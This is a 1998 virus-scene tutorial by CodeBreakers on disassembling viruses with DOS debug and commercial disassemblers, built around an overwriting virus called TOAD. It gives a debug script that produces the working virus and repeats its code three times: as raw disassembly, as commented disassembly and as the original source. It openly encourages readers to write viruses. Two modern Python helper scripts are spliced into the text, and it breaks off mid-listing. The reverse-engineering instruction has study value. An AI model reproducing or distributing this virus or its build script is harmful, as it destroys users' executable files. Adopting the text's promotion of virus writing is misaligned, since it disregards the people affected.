**************************************************************************
Reverse Engineering: The Viral Approach.
By HornyToad & Opic
A CodeBreakers Production, (C) 1998 (http://www.Codebreakers.org)
**************************************************************************

Technology is advancing at an alarming rate every day. In order to keep up with the mainstream, industry programmers have had to utilize software reverse engineering to stay abreast of important advances. In a world of a million buzzwords, 'reverse engineering' has made a place for itself as a respectable activity. Chuckling, I wonder if a thief will eventually be called an acquisition technician. Reverse engineering is simply a method of prying into software to steal other programmers' techniques. We're not passing judgement on this practice; quite the contrary, we're very proud to be "engineers".

In the field of virus writing and cracking, however, we tend to use the word disassembly more often than reverse engineering. As the title indicates, the majority of this text is devoted to sparking interest in disassembling virus code. Disassembly can also be very helpful to the cracker and, in general, to any professional programmer. The cracker might use the disassembled code to extract and change passwords and access privileges. The professional programmer will most likely use reverse engineering to study others' techniques and advances in programming. The virus writer will most likely follow in the footsteps of the professional programmer. Who knows, that professional programmer might be a virus writer. Let's face it: if you want to learn how to program, do you want to rely on a boring, underpaid teacher to inspire you? Or would you like to learn how to program by creating a virus or hacking program? Trust me, virus writing is fascinating and challenging.

The art of virus disassembly and examination has been covered in a veil of ambiguity for quite a long time in the virus (and even more so in the anti-virus) community. There is a logical reason for this when you consider it.

On the side of the VX community: "If anyone knows how to disassemble and debug my virus, they can learn my techniques (which many virus writers don't want), and the AV can more easily scan for and disinfect the virus after examination."

On the side of the AV: "If people understand how viruses work, and can even write their own disinfection routines or remove a virus infection manually, then the mystical hysteria that a viral infection brings can no longer be used to my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough).

So no matter which side of the fence you stand on, it should be clear that virus disassembly should be a major part of your viral studies. If you are a member of the AV community and find yourself in conflict with the fact that you are reading a tutorial which comes from the side of the VX, take heart! The AV community will teach you the exact same thing that we are teaching you in this tutorial...**for a price** (as usual). 600 pounds is the last figure we saw for a cute little luncheon with a complimentary diskette containing some virus from the 80's and some shareware AV program. So take your pick. We personally find the VX side to be more noble, working in the pursuit of knowledge, while the AV works in pursuit of the all-encompassing '$' sign.

The virus community has undergone many changes in the past 10 years. In the beginning, darkness covered the abyss... This opening passage from the Bible describes the state of virus source code in the late 80's and early 90's. The push in the virus community was to release virus executables rather than the revealing source code.
Therefore, in order for the knowledge to spread throughout the underground, coders relied on disassemblies. Disassemblies were often very crude in those days and rarely worked. They did, however, shed light on the virus writer's strategy, which, for the most part, was enough to guide beginners in the right direction.

Over the years, the focus of the virus community has changed. Currently, the most common practice is to publish source code along with the executable. In fact, many virus writers prefer to publish only the source code. The intellectual advances are becoming more important to the coders than the destructive actions of the executable. We prefer to see the coder's original source rather than an executable. Even though we have test machines for watching how a virus works, viewing the original source is the most precise way to learn the virus writer's techniques.

Unfortunately, this change in strategy, releasing the source code, has led to the weakening of disassembly skills, primarily in the use of the debugger. A debug program is one that allows you to view and manipulate memory locations, registers, and individual program instructions. The DOS debug program is a powerful tool for prying open executables and exploiting the source code. We must footnote that a thorough knowledge of assembly language is a necessity in order to fully exploit debug. This article assumes that you are familiar with the basic assembly instructions. Our primary goal in writing this article is to spark the reader's interest in disassembling executables. Don't be afraid to uncover the secrets of the original programmer.

Debug

There are many fine disassemblers and debuggers on the market. If you are willing to pay the big bucks, take a look at such programs as Sourcer, IDA, and SoftICE. Before you go out there and spend a lot of money on a big name program, take a look at the one that you already have, Debug. No, we're not crazy. Look in your \windows\command directory.
We'll bet it's there. If not, do a search of your DOS files; it's hiding somewhere on your drive. Go to a DOS prompt and type debug. You should see the debug prompt "-" on the next line. Debug is loaded into memory and is ready to use. To quit out of debug, press "Q" then <Enter>. Let's first take a quick look at the debug commands:

*Hint* All numbers passed to debug are assumed to be hex. You do not need to add the "h" at the end of the number. We would recommend buying a calculator that handles hex conversion.

*Hint* Please find a copy of the MS-DOS User's Guide. It is very helpful for learning some of the basics about DOS operations. It also contains a very informative guide to debug usage. All of the debug commands are explained with examples. A must for your library!

(A)ssemble- Allows you to input assembly statements and translates them into machine code. Type "A" and press <Enter>. You will be returned an address in the form of segment:offset. The default offset for this command is 100.

(C)ompare- In order to compare two areas of memory, type "c memLocA range memLocB". This command defaults to the data segment (DS). The memory contents will be displayed side by side.

(D)isplay- Used simply to view a memory location. Again the default segment register is DS for this command, but you can specify any segment you want. For example, "-D CS:100" displays 80 hex bytes (the default) beginning at CS:100. A length other than the default can be specified by including "L" in the command line, for example, "-D CS:100 L100".

(E)nter- Allows you to enter data or machine code into a specified location. Typing:
    E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
will enter this line of code starting at address cs:100.

(F)ill- Useful for filling a memory range with a specified value. Type:
    -f 100 500 'Codebreakers Rule!'
This will fill the memory locations from 100 to 500 with some important words to remember. Type 'd 100' to see them.

(G)o- Executes the program loaded into memory up to a specified breakpoint.

(H)exadecimal- This is your handy dandy hex calculator. Enter 'H' followed by two hex values, and debug will return the hex sum and difference of the two values. Very useful!

(I)nput- Displays a byte from a port address.

(L)oad- Very useful command! This command allows you to load a program or disk sectors into debug. "-L" on its own loads the (N)amed file into memory. "-L" followed by an address, drive, first sector, and sector count, for example "-L 100 0 10 20", loads 20 (hex) sectors from drive A (0), starting at sector 10, to CS:100. The default segment for this command is CS.

(M)ove- Moves the contents of one location to another. Default is DS. Syntax:
    -m ds:100 l50 DS:300
This will move 50 bytes from ds:100 to location ds:300.

(N)ame- Names a file that you entered.

(O)utput- Sends a byte to a port.

(P)roceed- Executes through a routine.

(Q)uit- Quits debug.

(R)egister- Displays the registers and the next instruction.

(S)earch- Searches a specified range (default segment DS) for a "string" or data entity. Returns the location if found.

(T)race- Begins executing a program in single step mode. A range can be specified.

(U)nassemble- Produces assembly instructions for a specified range, or simply 32 bytes when unspecified. Default is CS.

(W)rite- Writes a (N)amed file to disk. In essence, this is your save command.

We think that the best way to learn how to use debug is through a practical example. In general, people always learn faster when they have hands-on training. Well, that's what you are going to get. And guess what, you are going to perform your first virus disassembly! We have specifically chosen a small, uncomplicated virus for this first example.

Below, you will see a debug script to create an instructional virus from the CodeBreakers VX magazine. Study the commands. The first line (N)ames a program called TOAD.COM. The next several lines (E)nter machine code from CS:100 up to CS:01B4. The lines "RCX" and "00B4" load the program length into CX. When in doubt as to the length of the program, look at the offset at the beginning of the last (E)nter line, in this case 01B0. Then count single bytes across to the final byte entered, "24", 4 bytes across. That puts the end of the program at 01B4, and subtracting the 100 where the program starts leaves B4. Easy. The next line (W)rites the program (TOAD.COM). The final line (Q)uits out of debug. We hope that you are already realizing the wealth of information that you can get from using the debug program.
Save the information below in a file called "toad.txt". At a dos prompt, type: "debug toad.txt ". Debug will then execute the instructions in toad.txt and present you with a functional virus, toad.com. Do not worry about this virus spreading and destroying your system, it won't. This a very simple com overwriting virus. Follow my instructions and nothing will happen. N TOAD.COM E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79 E 01B0 2E 0A 0D 24 RCX 00B4 W Q In a way, I cheated by giving you the machine code to the virus ahead of time. Normally, the task of the disassembler (coder) would be to produce source from only the executable. Anyway, now that you have the working virus executable, lets get to work. Load toad.com into a debug session by typing: A:\debug toad.com <- type - <- debug prompt (ready for action) Remember that executable code begins after the

Program Segment Prefix (PSP) at CS:100. What we therefore need to do is view the (R)egisters and find out the length of toad.com. Typing "r" at the debug prompt allows you to see the values of the registers. The important one that we are looking for first is the initial value of CX. CX holds the length of the program, in this case B4 hex (180 decimal) bytes. Take a moment to study the different registers. Notice that the "r" command also printed the assembly code for the first instruction. 278E:0100 is the segment:offset address for CS:100, or the beginning of the program. Notice also that IP is set to 100. "B44E" disassembles to the assembly instruction "MOV AH,4E".

-r
AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
278E:0100 B44E          MOV     AH,4E
-

Now that we have the length of the program, we can (D)isplay, or dump, the program's machine code to the screen. This is accomplished by (D)isplaying from CS:100 for a (L)ength of b4. Observe below that the data portion of the virus follows directly after the executable portion. This is the first clue that we have as to the offset of the data structure. From the beginning of the data portion of the code, any assembly instructions that debug "translates" for you will be bogus. Type:

-d cs:100 lb4
278E:0100  B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E   .N3../..!r...=..
278E:0110  00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E   ..!..@.......!.>
278E:0120  CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A   .!.O.....5..!. *
278E:0130  2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74   .com.Congratulat
278E:0140  69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69   ions! You have i
278E:0150  6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20   nfected all the
278E:0160  43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69   COM files in thi
278E:0170  73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69   s ..directory wi
278E:0180  74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74   th the Toad inst
278E:0190  72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E   ructional virus.
278E:01A0  20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79    Have a nice day
278E:01B0  2E 0A 0D 24                                       ...$
-

In both the listing above and the one below, it is easy to determine the end of the program instructions. In this case, find the CD 20 (int 20) instruction which terminates the virus. Directly after the CD 20 at location CS:012D, the first sign of a data portion appears: hex 2A, the * character.

-u cs:100 l2f
278E:0100 B44E          MOV     AH,4E
278E:0102 33C9          XOR     CX,CX
278E:0104 BA2F01        MOV     DX,012F
278E:0107 CD21          INT     21
278E:0109 721B          JB      0126
278E:010B B8023D        MOV     AX,3D02
278E:010E BA9E00        MOV     DX,009E
278E:0111 CD21          INT     21
278E:0113 93            XCHG    BX,AX
278E:0114 B440          MOV     AH,40
278E:0116 B9B400        MOV     CX,00B4
278E:0119 BA0001        MOV     DX,0100
278E:011C CD21          INT     21
278E:011E B43E          MOV     AH,3E
278E:0120 CD21          INT     21
278E:0122 B44F          MOV     AH,4F
278E:0124 EBDC          JMP     0102
278E:0126 B409          MOV     AH,09
278E:0128 BA3501        MOV     DX,0135
278E:012B CD21          INT     21
278E:012D CD20          INT     20

It is important that you are aware of what bogus assembly instructions look like. This is where an understanding of basic assembly is required. Take a look below at the code before the break. It is easy to decipher what the actual instructions are. You might even recognize what the virus is doing from this little snip of code. Then, after the int 20, all hell breaks loose. What the hell is this "sub ch,[6f63]"? What an eyesore! When code begins to look like this, you are going to be forced to draw a conclusion:

1. The code segment has ended.
2. The data segment might be starting.
3. We may be dealing with code polymorphism or encryption.
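
One rough way to get a hint about where code gives way to data is to look for runs of printable characters, which is what the right-hand column of the (D)isplay output already lets you do by eye. The sketch below, in Python and not part of the original article, rebuilds that ASCII column and lists the printable runs in two rows copied from the dump above. The function names and the minimum run length of 4 are assumptions chosen for illustration, and the result is only a hint, never proof.

```python
# Heuristic sketch: printable-ASCII runs as a hint for where data begins.
# Function names and the min_len threshold are illustrative assumptions.


def is_printable(value: int) -> bool:
    """True for the characters debug shows as-is in its ASCII column."""
    return 0x20 <= value <= 0x7E


def ascii_column(data: bytes) -> str:
    """Render bytes the way the right-hand column of a hex dump does."""
    return "".join(chr(b) if is_printable(b) else "." for b in data)


def printable_runs(data: bytes, base: int, min_len: int = 4):
    """Return (offset, text) for each run of at least min_len printable bytes."""
    runs = []
    start = None
    for index, value in enumerate(data):
        if is_printable(value):
            if start is None:
                start = index
            continue
        if start is not None and index - start >= min_len:
            runs.append((base + start, data[start:index].decode("ascii")))
        start = None
    if start is not None and len(data) - start >= min_len:
        runs.append((base + start, data[start:].decode("ascii")))
    return runs


if __name__ == "__main__":
    # Rows 0120 and 0130 copied from the dump in the text.
    rows = bytes.fromhex(
        "CD21B44FEBDCB409BA3501CD21CD202A"
        "2E636F6D00436F6E67726174756C6174"
    )
    print(ascii_column(rows[:16]))
    for offset, text in printable_runs(rows, base=0x120):
        print(f"{offset:04X}: {text!r}")
```

Note that the first run starts at 012E, one byte early, because the 20 in CD 20 happens to be a printable space. That is exactly why a heuristic like this should only point you at a region to inspect by hand.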

There are other possibilities, but for the sake of the beginner, at a minimum, recognize that a change has occurred.

278E:0122 B44F          MOV     AH,4F
278E:0124 EBDC          JMP     0102
278E:0126 B409          MOV     AH,09
278E:0128 BA3501        MOV     DX,0135
278E:012B CD21          INT     21
278E:012D CD20          INT     20
-------------------------------------------------------------
278E:012F 2A2E636F      SUB     CH,[6F63]
278E:0133 6D            DB      6D
278E:0134 00436F        ADD     [BP+DI+6F],AL
278E:0137 6E            DB      6E
278E:0138 67            DB      67
278E:0139 7261          JB      019C
278E:013B 7475          JZ      01B2
278E:013D 6C            DB      6C
278E:013E 61            DB      61
278E:013F 7469          JZ      01AA

Once you are comfortable with moving around a program within debug, it is time to formulate an intelligent looking disassembly. We'd like to classify disassembly into two different forms: the utility disassembly and the work of art. The utility disassembly is when someone simply copies the debug output into a file and gives it an asm extension. This code can look quite ugly and may not even work. The work of art is when someone adds assembler specific instructions to the asm file, gives meaningful symbolic names, translates data, and comments the code. For example:

1. Assembler specific instructions: If you are using TASM, for example, and the virus is of COM file type, include such directives as:

code    segment
        assume  cs:code,ds:code
        org     100h
        :
        :
code    ends
        end     start

You might even want to include TASM compile instructions like:

;TASM nameOfVirus.ASM
;TLINK /t nameOfVirus.OBJ

Including the above instructions/structures in the code will aid people who might not be TASM literate in assembling the virus.

2. Meaningful symbolic names: During disassembly, whether through debug or an expensive disassembler, symbolic names of procedures, labels, and variables are lost. Debug translates them as actual memory addresses. Disassemblers often assign them meaningless names like "loc_1". Take a look at the examples below. Which one of them would be easier for a beginner to understand?
They both accomplish the same end result, although the code on top is more self-explanatory and is easier for the beginner to understand.

find_first:
        mov     ah,4eh
        xor     cx,cx
        lea     dx,comFile
        int     21h
        jc      outMessage

or

loc_1:
        mov     ah,4Eh
        xor     cx,cx
        mov     dx,12Fh
        int     21h
        jc      loc_2

3. Translate data: Once more, which one looks better? Enough said. It might be tedious breaking out the ASCII code chart and translating the data section, but when someone looks at your disassembly, they will appreciate it.

        db      '*.com', 0
        db      'Congratulations! You have infect'

or

        db      2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h
        db      74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h
        db      6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h
        db      63h, 74h

4. Comment your code: We have had many programming teachers say that you can never put too many comments into your code. We have heard an equal number say that there only need to be a few concise comments. It's a never-ending battle. We would tend to recommend including too many comments rather than not enough. Many beginners are given the advice that, in order to learn assembly, you have to study source code. That's fine and dandy, but when you're not necessarily comfortable with assembly, looking at naked code can give you a headache. Try to provide enough comments so that the beginner can understand how each line fits into the program's operation. For example:

        mov     ah,3Eh          ;function 3Eh-close file
        int     21h             ;go dos!
        mov     ah,4Fh          ;function 4Fh-find next file
        jmp     find_file       ;jump to find next file to infect

Essentially, that's all there is to it. Extract the assembly instructions and data through the use of debug into an asm file. Tidy the code up, add comments, and turn the file into a work of art by following the few pointers that we stated above. We realize that this is very short and sweet, but in order to include everything about debugging operations, we would need to write a book.
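
The "translate data" step from point 3 is mechanical enough to hand to a small script instead of an ASCII chart. The following is a minimal sketch in Python, not something from the original article; the helper names format_byte and to_db are invented here, and the output style (quoted runs, hex values with an "h" suffix and a leading zero where needed) is only our imitation of the db lines shown above.

```python
# Sketch: turn raw data bytes into a readable TASM-style "db" line.
# Helper names and exact output style are illustrative assumptions.


def format_byte(value: int) -> str:
    """Format a non-printable byte: small values in decimal, others as hex."""
    if value < 10:
        return str(value)
    text = f"{value:02X}h"
    # Assemblers expect a hex literal to start with a digit, e.g. 0CDh.
    return text if text[0].isdigit() else "0" + text


def to_db(data: bytes) -> str:
    """Group printable characters into quoted strings, the rest as numbers."""
    parts = []
    run = []
    for value in data:
        # 27h is the single quote, which cannot sit inside a quoted run.
        if 0x20 <= value <= 0x7E and value != 0x27:
            run.append(chr(value))
            continue
        if run:
            parts.append("'" + "".join(run) + "'")
            run = []
        parts.append(format_byte(value))
    if run:
        parts.append("'" + "".join(run) + "'")
    return "db " + ", ".join(parts)


if __name__ == "__main__":
    print(to_db(bytes([0x2A, 0x2E, 0x63, 0x6F, 0x6D, 0x00])))
    print(to_db(bytes([0x79, 0x2E, 0x0A, 0x0D, 0x24])))
```

Fed the first six data bytes from the listing above, this prints the same "db '*.com', 0" line that the hand translation produced.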
There are many more techniques which need to be implemented to counteract anti-debugging techniques. Thankfully, many of the more powerful disassemblers on the market today can defeat the majority of anti-debugging techniques.

After trying hard to sell you on debug, we have to admit that we more often use Turbo Debugger by Borland for viewing code. Essentially, both programs accomplish the same thing. But Turbo Debugger's delivery is very sweet. As you trace through your code, you can view the flags and registers changing dynamically in separate windows. There is a window in the lower right-hand corner of the screen that allows you to view the stack as values are pushed onto and popped off of it. Breakpoints are easy to set, so that you can execute your program up to a certain point, checking the registers and flags to see the results. All in all, Turbo Debugger is a fascinating program and learning tool. We highly recommend it.

Now, let's take a quick look at the same virus executable, but this time we'll put it under a slightly different microscope: a disassembler. What do we need to get started? We are going to start out with the simplest and most effective setup we can. So first things first: go collect the tools that you don't have from the list below.

Tools we need:

1)A good disassembler (duh) or two. Many people will argue that this disassembler is better than that one and this one sucks because that one...blah, blah, blah. You're boring us! The fact is that a disassembler program is a tool: just a tool. You use it WITH your intellect and can make it as valuable or as worthless as you wish. There are a lot of disassemblers out there, but this is the one we are going to be working with, because first of all it is relatively easy to use and second it is fairly accurate and widely available: Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is probably an even better disassembler: IDA.
But it is much more difficult to acquire and is VERY large in size. Feel free to try the demo version, but you will not be able to save your disassemblies (very cheap on their part), so we chose not to use examples from it in this tutorial. However, we would suggest that you cross reference (double-check) your disassemblies from Sourcer with those from IDA as well as through a debugger. This will help you in recreating a more precise disassembly.

2)The Ralf Brown Int list. This is IMPERATIVE in disassembly! You can acquire it at:
http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html
or:
http://www.simtel.net/pub/simtelnet/msdos/info/
(the file intwin**.zip -currently intwin57.zip...still updating)

3)TOAD.COM, an overwriting virus which can be found as a debug script in the debugging portion of this tutorial or in Codebreakers VX Zine #1, available at: http://www.codebreakers.org.

Alright, now we are going to start from the ground up. What is a disassembly? Simply, it is drawing the source code of an executable program from the program itself. This is EXTREMELY useful in learning programming tricks and examining code that you do not understand and do not have the source code to. It is even more useful to the virus writer, who can acquire a copy of just about any virus in executable form through the WWW or his/her contacts, but for whom coming across the source code can be impossible.

Now let us interject some of the problems we see today with most virus disassemblies and what it truly means to do a disassembly. Most viral disassemblies that you will download off the net are very, very sloppy code which in almost every instance won't even compile (and often, if it will, it will function NOTHING like the original virus did). This is usually due to one simple factor: the executable was run through a disassembler without being examined, corrected, altered, etc.
In other words, the person doing the disassembly just ran it through the program and zipped it up. This is an almost useless and definitely fruitless practice which we would like to see an end to.

What does it mean to do a "real" disassembly? Well, the most accurate disassemblies are done through debug with notepad open, recording step by step what the virus does. BUT, many of us do not have the time to do such disassemblies, and we will argue that a disassembly done through one of today's disassembler programs, combined with some footwork on the part of the reverse engineer and mixed with a bit of debugging (to clarify the gray areas of the disassembly), can do AS good if not a BETTER job than the 100% debug route. The three most important aspects of doing a disassembly of a program are:

1)Know how to set the options on your disassembler to create the most accurate disassembly possible.

2)Have another disassembler and a debugger to cross reference with (i.e., a lot of disassemblers make errors, and it is good to use more than one to get a more accurate "picture" of the program you are disassembling).

3)Do NOT just leave the disassembly as it lies when it comes out of the disassembler. The ASM file that comes from the disassembler is the RAW material from which we will sculpt a working, functioning likeness of the original virus. We will need to clean it up, get rid of junk inserted by the disassembler, get rid of locational numbers, and give labels more descriptive names. And while we are doing that, we will intuitively begin to get a better sense of the virus we are disassembling. You should have the Ralf Brown files open during your entire "cleaning process" to refer to. Constantly double check strange ints and sub-functions, and make the code "human" again.

We find the easiest way to illustrate this process is to show it to you step by step.
We will show you examples from Sourcer 7.0, what settings and options we have chosen, and how they look in their RAW form straight from the disassemblers. 1)Disassembly of TOAD.COM using Sourcer 7.0 Settings: Input file:TOAD.COM Target assembler: TASM 5.0 (We know that TASM was what was used to originally assemble this virus, so we will choose the most current version of tasm as a newer version almost always supports code from older versions but not visa versa. It is worthwhile to investigate what assembler the author of the virus you are disassembling preferred as it will aid you in your entire disassembly. Also choose: (functional match). Output filename: TOAD.ASM File format: press F so that output displays .asm is displayed so we can do away with those annoying segment addresses and what not Sourcer will otherwise insert. Remarks:all. why not? Lets see what Sourcer can help us with. Label type: We choose decimal, they are all annoying but this one is easiest for me, this is pretty much just preference here. OK, thats a pretty decent setup for Sourcer, lets see what it came up with: --------------------------------------------------------------------------- PAGE 59,132 ;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU ;UU UU ;UU TOAD UU ;UU UU ;UU Created: 19-Oct-97 UU ;UU Passes: 5 Analysis Options on: none UU ;UU UU ;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU target EQU 'T5' ; Target assembler: TASM-5.0 include srmacros.inc ; The following equates show data references outside the range of the program. 
data_1e equ 9Eh seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h toad proc far start: mov ah,4Eh ; 'N' loc_1: xor cx,cx ; Zero register mov dx,12Fh int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_2 ; Jump if carry Set mov ax,3D02h mov dx,data_1e int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx xchg bx,ax mov ah,40h ; '@' mov cx,0B4h mov dx,100h int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer mov ah,3Eh int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle mov ah,4Fh ; 'O' jmp short loc_1 loc_2: mov ah,9 mov dx,offset data_4 ; ('Congratulations! You hav') int 21h ; DOS Services ah=function 09h ; display char string at ds:dx int 20h ; DOS program terminate db '*.com', 0 data_4 db 'Congratulations! You have infect' db 'ed all the COM files in this ', 0Ah db 0Dh, 'directory with the Toad ins' db 'tructional virus. Have a nice da' db 'y.', 0Ah, 0Dh, '$' toad endp seg_a ends end start ---------------------------------------------------------------------------- O.K, not bad, not bad at all really. If we like we can attempt to recompile this code and see if it compiles and runs properly. It looks fairly legible, so what we can do is run it through IDA to see if we get any differences in code construction or content. While we may not see much here because this is a simple overwriting virus, We can assure you that you will see it in more complex code (We will talk about some common disassembler flaws and errors later on). Go ahead and run Toad.com through the demo version of IDA (if you have it) and you'll see very little variation in code. Which means we can move on to the next step of cleaning and commenting the code. Here is the code after we have sifted through it removed the junk Sourcer includes and renaming locations and data labels as well as clearing up odd bits of code. 
---------------------------------------------------------------------------- ;************************************************************************** ; TOAD Overwriting Virus ; ; Disassembly By Opic [CodeBreakers '98] ; ; Recompilable with TASM/TLINK ; ;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about ;this virus as it is very uninteresting by nature, and has little value ;other then as an instructive device. ;************************************************************************** virus segment byte public assume cs:virus, ds:virus org 100h toad proc near ;was far, disassembler ;incosistancy start: ;start of virus code mov ah,4Eh ;function 4eh-find first file find_file: xor cx,cx ;clears CX register mov dx,filespec ;12Fh points to *.com so ;well just rename it with ;a label to make life easier int 21h ;go DOS! jc no_more_files ;If there are no more files ;to infect (i.e. if carry ;flag is set) then jump here mov ax,3D02h ;open file for read/write acess mov dx,9eh ;get file info ;ok heres a small difference ;in the disassembly...in which ;sourcer had mov dx,data_1e ;data_1e being: 9eh ;so lets just cut out the ;middle man (as the author ;probably did...... int 21h ;Go dos! ; xchg bx,ax ;puts file handle in bx from ax mov ah,40h ;function 40h-write to file mov cx,offset end_virus - offset find_file ;this is the length we want to ;write to the file we are ;infecting...it is the same as ;mov cx,0B4h which the length ;of our virus from 100h (start ;of .com file) lea dx, start ;esentially again the same ;command we are just making it ;more 'human' for the reader ;this is telling us to start ;writing from the 'start' label ;which is conviently located at ;100h thus same as: mov dx,100h int 21h ;go dos! mov ah,3Eh ;function 3Eh-close file int 21h ;go dos! mov ah,4Fh ;function 4Fh-find next file jmp find_file ;jump to find next file to ;infect no_more_files: mov ah,9 ;function 9-write string to ;standard output. 
ie: write a ;message on the screen mov dx,offset message ;get the message from the ;data segment int 21h ;go dos! ; int 20h ;int 20h-DOS program ;terminate filespec db '*.com', 0 message db 'Congratulations! You have infected all the COM files in this ',10,13, db 'directory with the Toad instructional virus. Have a nice day.',10,13,'$' ;here we just put the message back together in more cohesive order and changed ;the hex from 0Ah, 0Dh to its logical same: 10,13. end_virus label near ;just our ;formal closings toad endp seg_a ends end find_file ;makes sense yes? ---------------------------------------------------------------------------- Now you see? It looks very clean and is even more legible then the code produced by Sourcer. All we have really done is given expressive labels to some code that was either given a generic label such as: data_1e or given code expressed in hexadecimal such as 0B4h with the expressive label: offset end_virus - offset find_file. We have also corrected any small syntax errors which Sourcer may have produced. This is the point at which we need to double check that the code compiles and the virus runs and infects properly. If bugs are encountered we can use debugger to walk through the executable step by step to see where we have strayed from the original source and where specifically our errors lie. Alright, now it's time for the big test, lets compare our disassembly with Horny Toad's original source and see how it compares. ---------------------------------------------------------------------------- code segment assume cs:code,ds:code org 100h toad proc near first_fly: mov ah,4eh find_fly: xor cx,cx lea dx,comsig int 21h jc wart_growth open_fly: mov ax,3d02h mov dx,9eh int 21h eat_fly: xchg bx,ax mov ah,40h mov cx,offset horny - offset first_fly lea dx,first_fly int 21h stitch_up: mov ah,3eh int 21h mov ah,4fh jmp find_fly wart_growth: mov ah,09h mov dx,offset wart int 21h cya: int 20h comsig db "*.com",0 wart db 'Congratulations! 
You have infected all the COM files in this ',10,13 db 'directory with the Toad instructional virus. Have a nice day.',10,13,'$' horny label near toad endp code ends end first_fly ----------------------------------------------------------------------------- Ahh...you see? Identical! that's right, Using the executable file TOAD.COM I have derived the original source code instruction for instruction. As you have probably already guessed this feat increases in difficulty exponentially with the complexity of the virus you are disassembling, however using the same intuition we used to clean up this code we can create logical patches and fixes in sections of the code produced by the disassembler which would otherwise not function properly. This is the area of disassembly when using a secondary disassembler and debugging come in very handy in finding the problem areas created by the initial disassembly. A true and accurate disassembly should incorporate a debugger verifying the majority of code produced by the disassembler. Other things to be aware of: There are a few other things we'd like to touch on before we draw this to a close. The first is simply that especially when doing reverse engineering it is important to understand the ways a virus, or any program for that matter functions on a 'technical' level. By this we mean you should understand simple concepts that a surprising amount of coders do not fully understand; i.e. understanding hexadecimal values, segment addresses, and other basic aspects of 8086 architectural structure. We mention these because it is very likely that you will run into some difficulty in making a disassembly due to this very fact. Allow me to illustrate with a simple example: Suppose you came across this line of code in a disassembly: mov dx,12Fh o.k. 
so we know we are loading DX (the data register) with the value 12Fh, which is an offset. In a .COM file code and data share one segment, so we go to offset 12Fh in that segment and we find:

seg000:012F db 2Ah
seg000:0130 db 2Eh
seg000:0131 db 63h
seg000:0132 db 6Fh
seg000:0133 db 6Dh
seg000:0134 db 0

WTF is that? This is the point where most new coders stop and say "Fuck it anyways!" and it can be frustrating to see 50-200 lines of this, but with a bit of patience we can make it fall into place. It's really just ASCII text in hexadecimal form! Watch:

db 2Ah ;*
db 2Eh ;.
db 63h ;c
db 6Fh ;o
db 6Dh ;m
db 0   ;zero byte that terminates the string

Of course! It's the filespec db '*.com',0 which is the type of file we are searching for. It was simply the form in which it was presented to us that was confusing. That is what much of reverse engineering is about: taking the code OUT of the machine language and putting it BACK into a more understandable human language. As for converting hex to ASCII and vice versa, many disassemblers will do it for you and some will not. In any case it is worthwhile to get a good book on assembly that includes a hex-to-ASCII table.

Another thing to be aware of is some common errors made by disassemblers. One such error is when the disassembler translates a block of assembly instructions into a block of data. When viewed, the block will look like a chunk of meaningless data. Unfortunately, that chunk of "data" might be something as important as an interrupt handler. The key to understanding, or shall I say translating, the data is to look at the program code. Think to yourself: "What is missing in the program? How and when is the chunk of data being called?" You might even have to look at it through a debugger and bracket the block with breakpoints to see what it actually affects. In the end, your only option might be to substitute the "data" with your own assembly instructions. Be very careful when attempting to do this.
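Returning to the db listing found at 12Fh: the hex-to-ASCII step can be automated when a disassembler leaves you with pages of single-byte db lines. What follows is only a minimal sketch in Python, not part of any disassembler. The function name decode_db_lines and the SAMPLE constant are made up for this illustration, and the sketch assumes one byte per db line, written either as hex with a trailing h or as plain decimal.

```python
import re

# Hypothetical sample: the six bytes found at offset 12Fh in the listing.
SAMPLE = """\
seg000:012F db 2Ah
seg000:0130 db 2Eh
seg000:0131 db 63h
seg000:0132 db 6Fh
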